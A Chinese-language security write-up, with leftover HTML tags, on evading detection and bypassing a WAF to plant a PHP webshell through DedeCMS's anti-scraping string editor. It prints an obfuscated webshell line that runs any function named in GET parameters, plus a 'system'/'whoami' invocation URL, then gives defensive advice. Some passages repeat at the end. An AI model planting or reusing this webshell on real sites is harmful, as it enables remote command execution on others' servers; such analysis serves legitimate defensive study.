WebShell 免杀与 WAF 绕过的攻防对抗分析<\/h1>

前言<\/h2>
本文详细分析了一次针对织梦CMS的WebShell免杀与WAF绕过的攻防对抗过程。通过研究系统功能点、分析WAF防护机制，最终成功构造出能够绕过安全检测的WebShell payload。<\/p>

漏洞发现过程<\/h2>

1. 功能点定位<\/h3>

在织梦CMS系统中发现"防采集混淆字符串管理"功能，该功能允许编辑文件内容：<\/p>

文件路径：\/dede\/article_string_mix.php<\/code><\/li>

关键点：功能越多潜在漏洞越多<\/li>
<\/ul>
2. 文件写入分析<\/h3>
通过抓包和代码审计发现：<\/p>

文件内容被写入到特定位置<\/li>
通过搜索源代码定位到实际写入路径<\/li>
验证文件可访问性<\/li>
<\/ol>
WAF防护机制分析<\/h2>
1. 基础防护措施<\/h3>

命令执行函数被禁止（如system<\/code>、exec<\/code>等）<\/li>
全局变量被禁止<\/li>
动态变量调用受限<\/li>
<\/ul>
2. PHP文件模式检测<\/h3>
WAF检测两种PHP文件模式：<\/p>

<?php<\/code> 标准模式<\/li>
<?=<\/code> 短标签模式<\/li>
<\/ol>
3. 特殊过滤规则<\/h3>

禁止回调函数调用<\/li>
防止反引号命令执行<\/li>
过滤$@someVar($param)<\/code>等可疑语法<\/li>
<\/ul>
免杀WebShell构造<\/h2>
1. 核心payload<\/h3>
成功绕过的payload示例：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 异或和取反操作生成字符
<\/span><\/span><\/span>\/\/ 核心执行逻辑
<\/span><\/span><\/span><\/span>${$_}=@<\/span>$_GET[_<\/span>]($_GET[__<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. Payload解析<\/h3>


变量解析<\/strong>：<\/p>

${$_}<\/code> 等同于 $_GET<\/code>（因为$_<\/code>的值是'_GET'<\/code>）<\/li>
@<\/code>用于抑制错误输出<\/li>
<\/ul>
<\/li>

参数获取<\/strong>：<\/p>

$_GET[_]<\/code> 获取URL参数_<\/code>的值（作为函数名）<\/li>
$_GET[__]<\/code> 获取URL参数__<\/code>的值（作为函数参数）<\/li>
<\/ul>
<\/li>

执行流程<\/strong>：<\/p>

调用$_GET[_]<\/code>函数并传递$_GET[__]<\/code>作为参数<\/li>
等效于：函数名(参数)<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
3. 命令执行方式<\/h3>
通过URL参数传递执行命令：<\/p>
http:\/\/target\/path\/to\/shell?_=system&__=whoami
<\/code><\/pre>

_=system<\/code>：指定执行system<\/code>函数<\/li>
__=whoami<\/code>：传递whoami<\/code>作为命令参数<\/li>
<\/ul>
技术要点总结<\/h2>


字符生成技术<\/strong>：<\/p>

使用异或和取反操作生成所需字符<\/li>
绕过字符串直接检测<\/li>
<\/ul>
<\/li>

动态调用技术<\/strong>：<\/p>

通过GET参数动态指定函数和参数<\/li>
实现高度灵活的代码执行<\/li>
<\/ul>
<\/li>

WAF绕过思路<\/strong>：<\/p>

避免使用被检测的函数名直接出现<\/li>
利用变量解析和动态调用特性<\/li>
使用错误抑制符减少异常暴露<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


对管理员功能加强监控<\/strong><\/p>

限制文件写入权限<\/li>
记录文件修改操作<\/li>
<\/ul>
<\/li>

增强WAF规则<\/strong><\/p>

检测非常规的变量使用方式<\/li>
监控$_GET<\/code>等超全局变量的异常使用<\/li>
<\/ul>
<\/li>

代码审计重点<\/strong><\/p>

检查所有用户可控的函数调用<\/li>
验证动态代码执行的安全性<\/li>
<\/ul>
<\/li>

系统加固<\/strong><\/p>

禁用危险函数<\/li>
限制PHP短标签使用<\/li>
定期更新安全防护规则<\/li>
<\/ul>
<\/li>
<\/ol>
通过这种深入的攻防分析，我们可以更好地理解WebShell免杀技术和WAF绕过方法，同时也能针对性地加强系统防护。<\/p>

WebShell 免杀与 WAF 绕过的攻防对抗分析<\/h1>

前言<\/h2> 本文详细分析了一次针对织梦CMS的WebShell免杀与WAF绕过的攻防对抗过程。通过研究系统功能点、分析WAF防护机制，最终成功构造出能够绕过安全检测的WebShell payload。<\/p>

漏洞发现过程<\/h2>

WAF防护机制分析<\/h2>

免杀WebShell构造<\/h2>

前言<\/h2>
本文详细分析了一次针对织梦CMS的WebShell免杀与WAF绕过的攻防对抗过程。通过研究系统功能点、分析WAF防护机制，最终成功构造出能够绕过安全检测的WebShell payload。<\/p>